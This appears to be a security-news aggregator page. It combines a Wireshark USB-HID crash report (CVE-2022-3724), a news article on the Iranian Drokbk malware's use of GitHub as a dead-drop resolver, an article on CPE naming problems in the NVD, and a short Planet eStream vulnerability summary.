    #25 0x00007ffe205d15e7 in libwireshark!call_dissector_with_data () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #26 0x00007ffe205d2a23 in libwireshark!deregister_depend_dissector () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    #27 0x00007ffe205c76e0 in libwireshark!epan_dissect_run_with_taps () from Users/user/Downloads/WiresharkPortable64/App/Wireshark/libwireshark.dll
    

**Build information**

The crash initially happened on v3.6.8-0-gd25900c51508 Backtrace above is from Version 3.6.6 (v3.6.6-0-g7d96674e2a30)

    3.6.6 (v3.6.6-0-g7d96674e2a30)
    
    Compiled (64-bit) using Microsoft Visual Studio 2019 (VC++ 14.31, build 31107),
    with Qt 5.15.2, with libpcap, with GLib 2.66.4, with zlib 1.2.11, with Lua
    5.2.4, with GnuTLS 3.6.3 and PKCS #11 support, with Gcrypt 1.8.3, with MIT
    Kerberos, with MaxMind DB resolver, with nghttp2 1.44.0, with brotli, with LZ4,
    with Zstandard, with Snappy, with libxml2 2.9.10, with libsmi 0.4.8, with
    QtMultimedia, with automatic updates using WinSparkle 0.5.7, with AirPcap, with
    SpeexDSP (using bundled resampler), with Minizip.
    
    Running on 64-bit Windows 10 (21H2), build 19044, with Intel(R) Core(TM)
    i7-10750H CPU @ 2.60GHz (with SSE4.2), with 65281 MB of physical memory, with
    GLib 2.66.4, with Qt 5.15.2, without Npcap or WinPcap, with c-ares 1.17.0, with
    GnuTLS 3.6.3, with Gcrypt 1.8.3, with nghttp2 1.44.0, with brotli 1.0.9, with
    LZ4 1.9.3, with Zstandard 1.4.0, with AirPcap 4.1.0 build 1622, with light
    display mode, without HiDPI, with LC_TYPE=Norwegian Bokmål_Norway.utf8, binary
    plugins supported (21 loaded).

CVE-2022-3724: Crash in USB-HID dissector on Windows (#18384) · Issues · Wireshark Foundation / wireshark · GitLab

The custom malware used by the state-backed Iranian threat group Drokbk has so far flown under the radar by using GitHub as a "dead-drop resolver" to more easily evade detection.

A subgroup of the state-backed Iranian threat actor Cobalt Mirage is using a new custom malware dubbed "Drokbk" to attack a variety of US organizations, using GitHub as a "dead-drop resolver."

According to MITRE, the use of dead-drop resolvers refers to adversaries posting content on legitimate Web services with embedded malicious domains or IP addresses, in an effort to hide their nefarious intent.

In this case, Drokbk uses the dead-drop resolver technique to find its command-and-control (C2) server by connecting to GitHub.

"The C2 server information is stored on a cloud service in an account that is either preconfigured in the malware or that can be deterministically located by the malware," the report noted.

The Drokbk malware is written in .NET, and it's made up of a dropper and a payload.

Typically, it's used to install a Web shell on a compromised server, after which additional tools are deployed as part of the lateral expansion phase.

According to the report from the Secureworks Counter Threat Unit (CTU), Drokbk surfaced in February after an intrusion at a US local government network. That attack began with a compromise of a VMware Horizon server using the two Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046).

"This group has been observed conducting broad scan-and-exploit activity against the US and Israel, so in that sense any organization with vulnerable systems on their perimeter are potential targets," says Rafe Pilling, Secureworks principal researcher and thematic lead for Iran.

He explains Drokbk provides the threat actors with arbitrary remote access and an additional foothold, alongside tunneling tools like Fast Reverse Proxy (FRP) and Ngrok. It's also a relatively unknown piece of malware.

"There may be organizations out there with this running on their networks right now, undetected," he adds.

Fortunately, using GitHub as a dead-drop resolver is a technique that cyber defenders can look for on their networks.

"Defenders might not be able to view TLS-encrypted traffic flows, but they can see which URLs are being requested and look for unusual or unexpected connections to GitHub APIs from their systems," Pilling notes.

**Dead-Drop Resolver Technique Offers Flexibility**

The dead-drop resolver technique provides a degree of flexibility to malware operators, allowing them to update their C2 infrastructure and still maintain connectivity with their malware.

"It also helps the malware blend in by making use of a legitimate service," Pilling says.

**Robust Patching Is Critical Defense Strategy**

Pilling advises organizations to patch Internet-facing systems, noting well-known and popular vulnerabilities such as ProxyShell and Log4Shell have been favored by this group.

"In general, this group and others will quickly adopt the latest network vulnerabilities that have reliable exploit code, so having that robust patching process in place is key," he says.

He also recommends organizations hunt through security telemetry for the indicators provided in the report to detect Cobalt Mirage intrusions, ensure an antivirus solution is widely deployed and up to date, and deploy EDR and XDR solutions to provide comprehensive visibility across networks and cloud systems.

**Iran-Backed Threat Groups Evolving, Attacks on the Rise**

The CTU also noted Cobalt Mirage appears to have two distinct groups operating within the organization, which Secureworks has labeled Cluster A and Cluster B.

"The initial similarity in tradecraft resulted in the creation of a single group, but over time and multiple incident-response engagements we found we had two distinct clusters of activity," Pilling explains.

Going forward, the established groups are expected to continue to operate against targets aligned with Iranian intelligence interests, both foreign and domestic. He adds that the increased use of hacktivist and cybercrime personas will be used as cover for both intelligence-focused and disruptive operations.

"Email and social media-based phishing are preferred methods, and we may see some incremental improvement in sophistication," he explains.

In a joint advisory issued Nov. 17, cybersecurity agencies in the United States, United Kingdom, and Australia warned attacks from groups linked to Iran are on the rise. Cobalt Mirage is hardly on its own.

"Over the last two years we've seen multiple group personas emerge — Moses' Staff, Abraham's Ax, Hackers of Savior, Homeland Justice, to name a few — primarily targeting Israel, but more recently Albania and Saudi Arabia, conducting hack-and-leak style attacks combined with information operations," Pilling says.

The US Treasury Department has already moved to sanction the Iranian government for its cybercrime activities, which the department alleges have been carried out in systematic fashion against US targets via a range of advanced persistent threat (APT) groups.

Iranian APT Targets US With Drokbk Spyware via GitHub

A reliance on CPE names currently makes accurate searching for high-risk security vulnerabilities difficult.

In many cases, once a high-risk security vulnerability has been identified in a product, a bigger challenge emerges: how to identify the affected component or product by its assigned name in the National Vulnerability Database (NVD). That's because software products are identified in the NVD with a common platform enumeration (CPE) name, which are assigned by the National Institute of Standards and Technology (NIST), part of the US Department of Commerce.

The NVD uses a CPE to identify hardware and software components based on vendor, product, and version string. When software users want to determine, via the NVD, whether a component of a product they are using has any associated vulnerabilities, they must know the precise assigned CPE name of the component. However, it is often impossible to find a CPE for a particular component, whether they are open source or proprietary.

In most cases, this problem makes it impossible to reliably automate many of the processes required for software security, such as producing a software bill of materials (SBOM).

**Why Finding Vulnerabilities in the NVD is Hard**

To understand the scope of the problem, consider the following six conditions that make it extremely difficult, if not impossible, to search for component and product vulnerabilities in the NVD, due to its reliance on CPEs as the sole identifier.

1\. Vulnerabilities are identified in the NVD with a common vulnerabilities and exposures (CVE) number, e.g., "CVE-2022-12345," and the Common Vulnerability Scoring System (CVSS) is used to assign a threat level to each CVE. A CPE is typically not created for a software product until a CVE is assigned to it. However, many software suppliers have never reported a vulnerability (which would generate a CVE), so a CPE has never been created for the product in the NVD. 

This is not necessarily because the products have never had vulnerabilities, but because the developer may not have reported any existing vulnerabilities to the NVD.

As a result, an NVD search will yield a "No matching records" response in both of the following scenarios: 

(i) a vulnerability does not exist in a given product

(ii) a vulnerability exists but has never been reported by the developer

2\. Since there is no error checking performed when a new CPE name is entered in the NVD, it is possible to create a product CPE that does not follow a consistent naming convention. As a result, when a user searches for the product using the properly specified CPE, they will receive a "There are 0 matching records" error message. This is the same message they would receive if the original (off-specification) CPE name were used but there were no CVEs reported against it.

When a user receives this message, it could mean there is a valid CPE for the product they're searching on, but a CVE has never been reported for that product, but it could also mean the CPE they entered does not match the CPE in the NVD, and that there are, in fact, CVEs attached to the (off-specification) CPE name submitted to the NVD.

The "There are 0 matching records" error message could also result if a user misspells the CPE name in the search bar. In this instance, the user would have no way of knowing that the message was generated by a typo, and instead could assume the product has no reported vulnerabilities.

3\. Over time, a product or supplier name may change due to a merger or acquisition, and the CPE name for the product may change as well. In this case, if a user searches for the original CPE, not the new CPE, they would not learn about new vulnerabilities. As before, they would receive the "There are 0 matching records" message.

4\. This also applies for different variations of supplier or product names, such as "Microsoft" and "Microsoft Inc.," or "Microsoft Word" and "Microsoft Office Word," etc. Without the exact correct supplier or product name, an NVD search will yield incorrect results.

5\. The same product can have multiple CPE names in the NVD if they are entered by different people who each use a different iteration. This can make it virtually impossible to determine which name is correct. To make matters worse, if CVEs have been entered for each of the CPE variants, this will result in their being no "correct" name. One example is OpenSSL (e.g., "OpenSSL" versus "OpenSSL Framework"). Since no single CPE name contains all the OpenSSL vulnerabilities, users must search separately for each variation of the product name.

6\. In many cases, a vulnerability will only affect one module of a library. However, since CPE names are assigned on the basis of products, not the individual modules they contain, users need to read the full CVE report to determine which module is vulnerable. If they don't, this can result in unnecessary patching or mitigations, like when a vulnerable module is not installed in a software product being used but other modules of the library are.

Fortunately, a cross-industry group called the SBOM Forum that includes members of OWASP, The Linux Foundation, Oracle, and others are working on the problem and have developed a proposal to improve the accuracy of the NVD with a focus on modern, automated use cases.

The group's recommendations, including the adoption of a package URL (purl) for software and GS1 Standards for hardware, are designed to create a standardized way to reliably query the NVD and receive accurate information on vulnerabilities.

How Naming Can Change the Game in Software Supply Chain Security

Planet eStream versions prior to 6.72.10.07 suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Tag

#ssl